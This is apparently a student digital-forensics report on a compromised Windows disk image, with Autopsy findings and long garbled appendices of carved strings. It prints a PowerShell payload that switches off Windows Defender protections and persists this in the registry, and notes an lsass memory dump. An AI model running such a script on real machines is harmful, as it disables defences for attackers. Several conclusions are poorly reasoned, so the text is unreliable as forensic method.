Intelligence Report Final

Forensic Analysis Intelligence Report
ABOUT THIS REPORT
This report is based on PDF (portable document format) in order to view this report you must have
a pdf viewer install in your system if it is not present, you may be installed it by clicking on this
link
https://en.softonic.com/download/pdf-reader/windows/post-download?ex=BB-1549.1
Font used Content: Times new Roman size: 12
Font used heading: Times new Roman size: 16
Executive Summary
Forensic analysis of digital evidence is never performed in a vacuum – its necessity arises out of a
course of events whether in a criminal investigation, civil litigation or a policy violation in the
corporate environment. In this case my boss has acknowledged that I have been consistently
exceeding my junior analyst expectations, and as a result she has agreed to promote me into a
senior role. As a senior analyst, I will now be expected to lead a digital forensic investigation,
requiring little to no guidance in doing so.
After my promotion a new case has just arrived that requires my immediate attention. My
company has been contracted to conduct a digital forensic investigation into the compromise of
an existing customer’s host. The customer believes they have been re-compromised by the same
actor as previously investigated, so be on the lookout for overlapping TTPs.
Page 1/145
Case Details
Case Identifier
Customer
Customer Contact
Date Engaged 11-APRIL-2021
Forensic Investigator ALI BABA
Date Completed
Background
Once the case has been reported and the forensic examiner determines and classifies the cybercrime
case. The examiner will get to the scene of crime take control and secure the crime scene from
contamination by not allowing any person to interact with the digital equipment or device.
According to ACPO guidelines the forensic examiner should photograph the digital devices in the
crime scene or site and keep a record of the device status including the on-screen
details/information. The device should then be powered off if it’s on to isolate it from the network
and prevent any usage of the device that can temper with the data in the device. The forensic
examiner should seize chargers, cables manuals, phone bills and packaging if possible, the
packaging material may have some information for the forensic examiner. The digital devices must
be packaged well and carried in specialized carriers and only handled by authorized personnel.
As per usual, the customer’s Security Operations Centre (SOC) has performed an initial
investigation, and successfully located the compromised host. The host was contained and
reimaged, but not before the disk and memory were captured. Furthermore, the customer has also
provided me with a relevant network capture from a location somewhere within their network.
Page 2/145
Technical Analysis
As a forensic investigator I will be carrying out investigation on two image files, one named
disk.raw and the next being memory. Raw. The investigation environment is a Linux system that is
safe from viruses or worms. Its distribution name is Debian 10 and Autopsy will be the most used
tool for this investigation. Autopsy is one of the sleuth kit tools that runs locally on the browser and
fired from the terminal. This is a graphical user interface tool that is easy to navigate around and
collect forensic evidence.
Checking image integrity
This test is necessary so that to be sure the image file is as original as the original drive. I will do
this by comparing its hash value. Lets have a look at the MD5 hash comparison that will be done
by Autopsy tool. It is stated pass to show that the hash value are the same for the disk.raw image
file. The image file will now give correct evidence after investigation. This is shown in the figure
bellow.
Fig 1.0. shows the hash value comparison
I will also check the MD5 hash of the other image file named memory.raw. This image file also
pass the integrity check meaning the hash value has not changed.
Page 3/145
Fig 1.1. Shows the original vs current MD5 hash value comparison.
Another important factor is to check the image information. This is done by navigating to the image
details tab on the top bar of autopsy. We can view the file system information, the metadata
information, and the content information. The file system is of type NTFS, volume name WinRE
and version being Windows XP. The image information is shown at the bellow figure 1.2.
Fig 1.2. The image details is being shown.
How the computer was compromised
Page 4/145
The system hard drive was compromised in that it could not boot anymore. Some of the files were
also deleted. The deleted files are named unallocated file while those present are stated located The
attacker launched a virus that ended up compromising the hard drive. The system can not find the
drive during its booting process. We can see from the bellow figure how the system respond when
boot attempt is done.
Fig 1.2. shows the content of the boot directory.
The boot manager is said to be compressed and that's why we receive an error stating a disk read
error occurred.
So many file were deleted and this can be seen by clicking the all deleted file button that is on the
left side of the screen. This deleted files include images, documents of different formats, and other
executable files. The fig 1.3 bellow shows some on the deleted files.
Page 5/145
Fig 1.3. Shows some of the deleted files
From the list we can we a suspicious file having a .dll extension. Such a file is executable and any
malicious application may have been created that when executed by the user it corrupts the entire
system. I followed a path that leads to some deleted image file with png extension. From the bellow
figure we can see some of this images.
Fig 1.4. A deleted image in the contrast-black folder.
Page 6/145
Now I find some NTUSER.DAT file after analysiz this file it was confirmed that suspects using
these files for attacking vector Fig 1.5 to 1.7 show the mirror of the statement
Fig 1.5. Initial attack vector that was used to compromise the user
.
Name /img_disk.raw/vol_vol7/Users/Alan/ntuser.dat.LOG1
Type File System
MIME Type application/x.windows-registry
Size 425984
File Name Allocation Allocated
Metadata Allocation Allocated
Modified 2019-07-10 22:39:20 CDT
Accessed 2019-07-10 22:39:20 CDT
Created 2019-07-10 22:39:20 CDT
Changed 2019-07-10 22:39:20 CDT
MD5 c0e6b78b920e32d8b481f5cc01c7b6d7
Hash Lookup Results UNKNOWN
Internal ID 42864
From The Sleuth Kit istat Tool:
MFT Entry Header Values:

Entry: 80150 Sequence: 1
$LogFile Sequence Number: 542451411
Allocated File
Links: 2
$STANDARD_INFORMATION Attribute Values:

Flags: Hidden, System, Archive
Owner ID: 0
Security ID: 1554 (S-1-5-32-544)
Last User Journal Update Sequence Number: 7998848
Page 7/145
Fig 1.6
Fig 1.7
Name /
img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.MicrosoftEdge_8we
kyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/Y2A6TZJV/190806113425-03-russia-
explosion-0805-large-tease[1].jpg
Type File System
MIM
E image/jpeg
Type
Size 31989
File
Name
Allocated
Alloc
ation
Meta Allocated
data
Page 8/145
Alloc
ation
Modif
2019-08-17 01:40:06 CDT
ied
Acces
2019-08-17 01:40:06 CDT
sed
Creat
2019-08-17 01:40:06 CDT
ed
Chan
2019-08-17 01:40:06 CDT
ged
MD5 c3cfb8dc8cad94a62ed67d9ae273d726
Hash
Look
up UNKNOWN
Resul
ts
Intern
38657
al ID
From The Sleuth Kit istat Tool:
MFT Entry Header Values:

Entry: 83853 Sequence: 1
$LogFile Sequence Number: 305828567
Allocated File
Links: 2
$STANDARD_INFORMATION Attribute Values:

Flags: Archive, Not Content Indexed
Owner ID: 0
Security ID: 1828 (S-1-5-21-2423855938-2581495550-2013206183-1000)
Last User Journal Update Sequence Number: 9190072
after examines these document it was found that that payload will exist in the backend of this
document and this will auto disabled windows all security features
Page 9/145
Fig 1.8 document that was used to compromise the user
Fig 1.9 document that was used to compromise the user
Here I show you some metadata at the backend of the document which
containing the payload
# Disable Windows Defender features in real time

Set-MpPreference -MAPSReporting 0
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -DisableRealtimeMonitoring $True
Set-MpPreference -DisableBehaviorMonitoring $True
Set-MpPreference -DisableIntrusionPreventionSystem $True
Set-MpPreference -DisableIOAVProtection $True
Set-MpPreference -DisableRealtimeMonitoring $True
Set-MpPreference -DisableScriptScanning $True
Set-MpPreference -DisableArchiveScanning $True
Set-MpPreference -DisableCatchupFullScan $True
Set-MpPreference -DisableCatchupQuickScan $True
Set-MpPreference -DisableEmailScanning $True
Set-MpPreference -DisableRemovableDriveScanning $True
Set-MpPreference -DisableRestorePoint $True
Page 10/145
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $True
Set-MpPreference -DisableScanningNetworkFiles $True
Set-MpPreference -DisableBlockAtFirstSeen $True
# Persist Windows Defender features settings in registry
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
if (!(Test-Path -Path $path)) {
New-Item -Path $path -Force
New-ItemProperty -Path $path -Name "DisableAntiSpyware" -PropertyType DWord -Value 1
-Force
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
New-ItemProperty -Path $path -Name "SubmitSamplesConsent" -PropertyType DWord -Value 2
-Force
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
New-ItemProperty -Path $path -Name "DisableRealtimeMonitoring" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableBehaviorMonitoring" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableOnAccessProtection" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableScanOnRealtimeEnable" -PropertyType DWord
-Value 1 -Force
I found some mentioned below links through which machine will be compromised as this link will
contain malware because it was showing very high latency
Page 11/145
Fig 1.10 Link that was used to compromise the user
Appendix
AppendixA
EXIF Metadata
Device La Lo Al T
Date Manuf Device tit ngi tit a
Source File
Taken acture Model ud tud ud g
r e e e s
2004- /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
04-09 NT/MSScan/WelcomeScan.jpg
09:17:00
CDT
2004- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
04-09 fax-
09:17:00 common_31bf3856ad364e35_10.0.17763.1_none_fcca98cea8c9f397/
CDT WelcomeScan.jpg
2015- Cano Cano /
09-22 n n img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
12:50:15 EOS- MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CDT 1D X 001/MicrosoftEdge/Cache/Y2A6TZJV/190705115727-leonardo-
dicaprio-divestinvest-super-169[1].jpg
2017- /img_disk.raw/vol_vol7/Program
09-27 Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.
Page 12/145
Device La Lo Al T
Date Manuf Device tit ngi tit a
Source File
Taken acture Model ud tud ud g
r e e e s
17:05:12 21365.0_x64__8wekyb3d8bbwe/images/bg1a_thumb.png
CDT
2017- Cano Cano /
CST 1D X 001/MicrosoftEdge/Cache/KBBFFLP4/190815164849-alex-rotter-
tease-medium-tease[1].jpg
2018- Apple iPhon /
08-20 e7 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
13:09:09 Plus MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CDT 001/MicrosoftEdge/Cache/YATO9SWU/190419152043-01-greenland-
climate-change-small-169[1].jpg
2019- Cano Cano /
CDT 1D X 001/MicrosoftEdge/Cache/Y2A6TZJV/190806113425-03-russia-
explosion-0805-large-tease[1].jpg
AppendixB
Email Addresses
%[email protected]
T
a
Preview Source File
g
s
q[9me!b9 o17how@pg /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-

[«%[email protected]« US/M1033Mark.TBT.NUS
w&fib_$sf">r#/ c\`'
q[9me!b9 o17how@pg /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

[«%[email protected]« t..peech-en-us-
w&fib_$sf">r#/ c\`' onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/M10
33Mark.TBT.NUS
Page 13/145
%[email protected]
Ta
Preview Source File
gs
p checksum offlhoad «%[email protected]« /

`paramet@ers (e]b i img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
20eca21891c0180_blobs.bin
[email protected]
Ta
Preview Source File
gs
ult micros -windows «[email protected]« /

sour ` ndis nic a c img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/420e
ca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
,l va$e7 +xr, g" s «- /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

[email protected]«3 a9\%<gz
0r*b1 g" s
,l va$e7 +xr, g" s «- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

[email protected]«3 a9\%<gz speechrecognizer-en-
0r*b1 g" s us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.ngr
-putty-user-key-file-ssh-sshconnection@putty.projects.tartarus.org
Ta
Preview Source File
gs
rojects.tartarus.org«-putty-user-key-file-ssh- /
[email protected]«-2.0----- begin ssh2 img_disk.raw/vol_vol7/Window
s/Temp/plink.exe
Page 14/145
[email protected]
T
a
Preview Source File
g
s
*~ _a=6) ;g(2 )lcim /img_disk.raw/vol_vol7/Windows/Fonts/msjhbd.ttc

«[email protected]«0ex:100we
ddl5@@6?=88
*~ _a=6) ;g(2 )lcim /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«0ex:100we f..crosoftjhengheibold_31bf3856ad364e35_10.0.17763.1_none_4f76834
ddl5@@6?=88 204d02fe2/msjhbd.ttc
[email protected]
T
a
Preview Source File
g
s
l) ]0n0 n(&h) 0k0v0 /

«[email protected]« img_disk.raw/vol_vol7/Windows/SysWOW64/IME/IMEJP/IMJPDCT.EXE
tbfk0xs 0(&s) x0n0t
l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/System32/IME/IMEJP/IMJPDCT.EXE

«[email protected]«
tbfk0xs 0(&s) x0n0t
l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« d..-japanese-
tbfk0xs 0(&s) x0n0t utilities_31bf3856ad364e35_10.0.17763.1_none_ddf728caca4415b8/IM
JPDCT.EXE
l) ]0n0 n(&h) 0k0v0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]« d..-japanese-
tbfk0xs 0(&s) x0n0t utilities_31bf3856ad364e35_10.0.17763.1_none_e84bd31cfea4d7b3/IM
JPDCT.EXE
Page 15/145
[email protected]
T
a
Preview Source File
g
s
b-8d? 0- /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-
lb;*e+czh+t>«[email protected] US/M1033Zira.TBT.NUS
«- :&i,eak*]s"hrma*ù
b-8d? 0- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
lb;*e+czh+t>«[email protected] t..peech-en-us-
«- :&i,eak*]s"hrma*ù onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/M103
3Zira.TBT.NUS
[email protected]
T
a
Preview Source File
g
s
0 0g0m0~0[0 0 id o0 /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64
ft.com« ~0_0o0 __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
user@contoso Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/SysWOW64/WindowsCodecsRaw.dll

«[email protected]« 6@(x/
@6@zz wzs@` a
j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/System32/WindowsCodecsRaw.dll

«[email protected]« 6@(x/
@6@zz wzs@` a
j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« 6@(x/ windowscodecraw_31bf3856ad364e35_10.0.17763.1_none_85bb5b960fe
@6@zz wzs@` a 5efe7/WindowsCodecsRaw.dll
Page 16/145
T
a
Preview Source File
g
s
j'zg >f f $>g1 %a?? /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]« 6@(x/ windowscodecraw_31bf3856ad364e35_10.0.17763.1_none_901005e8444
@6@zz wzs@` a 6b1e2/WindowsCodecsRaw.dll
[email protected]
Ta
Preview Source File
gs
h axdx ta8i( >@830 .«[email protected]«- /

photo w@o+oxd+u +dx img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/
Windows/WebCache/V0100011.log
[email protected]
Ta
Preview Source File
gs
ttrehe)\ wow6 video/«[email protected]« /

%cservelr3 so@ftwar img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
[email protected]
Ta
Preview Source File
gs
t 0513110 832 ggif@«[email protected]« /

.idomn odei atolr 5 img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/420e
ca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
z b)d\\4 k00] /img_disk.raw/vol_vol7/Windows/Fonts/seguihis.ttf

674' /«[email protected]« 674'
yzuôv0y uuu_p
Page 17/145
T
a
Preview Source File
g
s
z b)d\\4 k00] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-font-

674' /«[email protected]« 674' truetype-
yzuôv0y uuu_p segoeui_31bf3856ad364e35_10.0.17763.1_none_c181ed9e6a661a64/seg
uihis.ttf
[email protected]
T
a
Preview Source File
g
s
bgpe,_,8on b>9yl;4 /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-

«[email protected]«35 US/M1033Mark.TBT.NUS
u $?yx&i*ln _br+v
bgpe,_,8on b>9yl;4 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«35 t..peech-en-us-
u $?yx&i*ln _br+v onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/M
1033Mark.TBT.NUS
[email protected]
T
a
Preview Source File
g
s
ea.$ z cz@, z2"z5# /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

@«[email protected]«7 4b;9b@;
<ww@<uw@ &
ea.$ z cz@, z2"z5# /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

@«[email protected]«7 4b;9b@; speechrecognizer-en-
<ww@<uw@ & us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.
ngr
Page 18/145
[email protected]
T
a
Preview Source File
g
s
7 \@7!\@ a[@lt )am$ /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

«[email protected]« 716ad
yaovy fkpf 9@
7 \@7!\@ a[@lt )am$ /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« 716ad speechrecognizer-en-
yaovy fkpf 9@ us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.ng
r
[email protected]
T
a
Preview Source File
g
s
bob jenkins, 1996. /img_disk.raw/vol_vol7/Windows/Help/en-US/credits.rtf

«[email protected]
m«. you may use this c
bob jenkins, 1996. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] help-credits.resources_31bf3856ad364e35_10.0.17763.1_en-
m«. you may use this c us_9f32aadd3c4c1e93/credits.rtf
[email protected]
T
a
Preview Source File
g
s
h}j 5sb1c !%)=cld <^«8- /img_disk.raw/vol_vol7/Windows/Fonts/msjhl.ttc

[email protected]« y\x5k5
y_ck) .ak3)%
h}j 5sb1c !%)=cld <^«8- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

[email protected]« y\x5k5 f..rosoftjhengheilight_31bf3856ad364e35_10.0.17763.1_none_58c8ac83
y_ck) .ak3)% 7e023ce9/msjhl.ttc
Page 19/145
[email protected]
T
a
Preview Source File
g
s
k7(@cv(@k alpo wa66 /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

«[email protected]«8 a9%z
@;8b@; @<zr@<
k7(@cv(@k alpo wa66 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«8 a9%z speechrecognizer-en-
@;8b@; @<zr@< us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.
ngr
[email protected]
T
a
Preview Source File
g
s
haar e-mail /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

'là«[email protected]«' is shared/ink/Alphabet.xml
nu 'là[email protected]
haar e-mail /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

'là«[email protected]«' is t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
nu 'là[email protected] 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/SysWOW64/msdrm.dll
«__nosuchmailid__@dontexis
t.foo« microsoft::informat
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/System32/msdrm.dll
«__nosuchmailid__@dontexis
t.foo« microsoft::informat
Page 20/145
T
a
Preview Source File
g
s
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«__nosuchmailid__@dontexis r..ement-client-v1-
t.foo« microsoft::informat api_31bf3856ad364e35_10.0.17763.1_none_d8c386bdeb6dfde2/ms
drm.dll
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«__nosuchmailid__@dontexis r..ement-client-v1-
t.foo« microsoft::informat api_31bf3856ad364e35_10.0.17763.1_none_e31831101fcebfdd/msd
rm.dll
[email protected]
T
a
Preview Source File
g
s
pcimpl::hrgeticrypt /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« windows: virmdocume e/18.143.0717.0002/ipcfile.dll
/signature> </xrml> /
oo« license-acquisition e/18.143.0717.0002/ipcsecproc.dll
oo« delegatedtenantid e e/18.143.0717.0002/msipc.dll
pcimpl::hrgeticrypt /
oo« windows: virmdocume e/18.143.0717.0002_1/ipcfile.dll
oo« license-acquisition e/18.143.0717.0002_1/ipcsecproc.dll
Page 21/145
T
a
Preview Source File
g
s
oo« delegatedtenantid e e/18.143.0717.0002_1/msipc.dll
/signature> </xrml> /img_disk.raw/vol_vol7/Windows/SysWOW64/winmsipc.dll

«[email protected]
oo« msipc onecoreuap\ds
mipccrypt::hrencode /img_disk.raw/vol_vol7/Windows/System32/winipcfile.dll
«[email protected]
oo« virmdocumentipcimpl
/signature> </xrml> /img_disk.raw/vol_vol7/Windows/System32/winmsipc.dll

«[email protected]
oo« msipc cbsize >= (si
mipccrypt::hrencode /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«[email protected] windows-r..ment-client-v2-
oo« virmdocumentipcimpl core_31bf3856ad364e35_10.0.17763.1_none_46def9d0c62d6f82/w
inipcfile.dll
/signature> </xrml> /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

oo« msipc cbsize >= (si core_31bf3856ad364e35_10.0.17763.1_none_46def9d0c62d6f82/w
inmsipc.dll
/signature> </xrml> /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

oo« msipc onecoreuap\ds core_31bf3856ad364e35_10.0.17763.1_none_5133a422fa8e317d/
winmsipc.dll
Page 22/145
[email protected]
T
a
Preview Source File
g
s
is not initialized «_c14e99c7- /img_disk.raw/vol_vol7/Program

44bb-44ef-9f1d- Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x
[email protected]« 64__8wekyb3d8bbwe/mso30imm.dll
unexpected provider

44bb-44ef-9f1d- Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x
[email protected]« 64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
unexpected provider Shared/OFFICE16/Mso30win32client.dll
dfromregistrystring /img_disk.raw/vol_vol7/Program
«_c14e99c7-44bb-44ef-9f1d- Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.
[email protected]« 0_x64__8wekyb3d8bbwe/mso30imm.dll
wzname is null, can

44bb-44ef-9f1d- Files/WindowsApps/microsoft.windowscommunicationsapps_17.933
[email protected]« 0.21365.0_x64__8wekyb3d8bbwe/mso30imm.dll
unexpected provider
[email protected]
T
a
Preview Source File
g
s
[email protected]' is nu /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

'là«[email protected]«'. shared/ink/Alphabet.xml
druk op #
[email protected]' is nu /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
'là«[email protected]«'. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
druk op # 7da144/Alphabet.xml
Page 23/145
[email protected]
T
a
Preview Source File
g
s
en één e-mailadres: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected]«. shared/ink/Alphabet.xml
"húp, húp,
en één e-mailadres: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
"húp, húp, 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
l.f tif) 7 %ld. ) /

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/pr
01/01/20000zadeva z nms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
l.f tif) 7 %ld. ) /

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRES.
01/01/20000zadeva z DLL
l.f tif) 7 %ld. ) /

«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_31b
01/01/20000zadeva z f3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXSRE
S.DLL
[email protected]
Tag
Preview Source File
s
m@ icrosoft\wi apps «[email protected]«, sha2-8 /

<@3{ a256:o img_disk.raw/vol_vol7/pagefile.s
ys
Page 24/145
[email protected]
Ta
Preview Source File
gs
<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« /doc0` Defender/Scans/mpcache-
rconsultdecl 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin
[email protected]
T
a
Preview Source File
g
s
<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« Defender/Scans/mpcache-
http://www.acabogac 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

http://www.acabogac
<(,d t8tt m-jc rv^5 /

«[email protected]« img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
http://www.acabogac dmp
<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« crypt32-
http://www.acabogac dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt3
2.dll
<(,d t8tt m-jc rv^5 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

http://www.acabogac dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
Page 25/145
T
a
Preview Source File
g
s
32.dll
[email protected]
T
a
Preview Source File
g
s
ing the user in the /

«[email protected] img_disk.raw/vol_vol7/Windows/SystemResources/Windows.UI.SettingsAd
m« format instead plea minFlowUIThreshold/pris/Windows.UI.SettingsAdminFlowUIThreshold.en-
US.pri
ing the user in the /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] s..dminflows.resources_31bf3856ad364e35_10.0.17763.1_en-
m« format instead plea us_f2cdb19306f6c2cf/Windows.UI.SettingsAdminFlowUIThreshold.en-US.pri
[email protected]
T
a
Preview Source File
g
s
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected]«0 cghd Defender/Scans/mpcache-
lm`@ ictc odz 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«0 cghd
lm`@ ictc odz
/raizaccv1_der.crl0 /
«[email protected]«0 cghd img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
lm`@ ictc odz mp
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
lm`@ ictc odz
Page 26/145
T
a
Preview Source File
g
s
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
lm`@ ictc odz
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 cghd crypt32-
lm`@ ictc odz dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32
.dll
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]«0 cghd crypt32-
lm`@ ictc odz dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32
.dll
[email protected]
T
a
Preview Source File
g
s
ion electronica1%0# /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]«0 Defender/Scans/mpcache-
070216153551z 2702 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
ion electronica1%0# /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

«[email protected]«0
070216153551z 2702
ion electronica1%0# /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
070216153551z 2702 ss.dmp
ion electronica1%0# /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

070216153551z 2702
Page 27/145
T
a
Preview Source File
g
s
ion electronica1%0# /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

070216153551z 2702
ion electronica1%0# /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

«[email protected]«0 windows-crypt32-
070216153551z 2702 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cry
pt32.dll
ion electronica1%0# /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

070216153551z 2702 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cry
pt32.dll
[email protected]
T
a
Preview Source File
g
s
ria de economia1$0" /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

050508000000z 2505
ria de economia1$0" /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
050508000000z 2505 ss.dmp
ria de economia1$0" /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

050508000000z 2505
ria de economia1$0" /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

050508000000z 2505
ria de economia1$0" /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

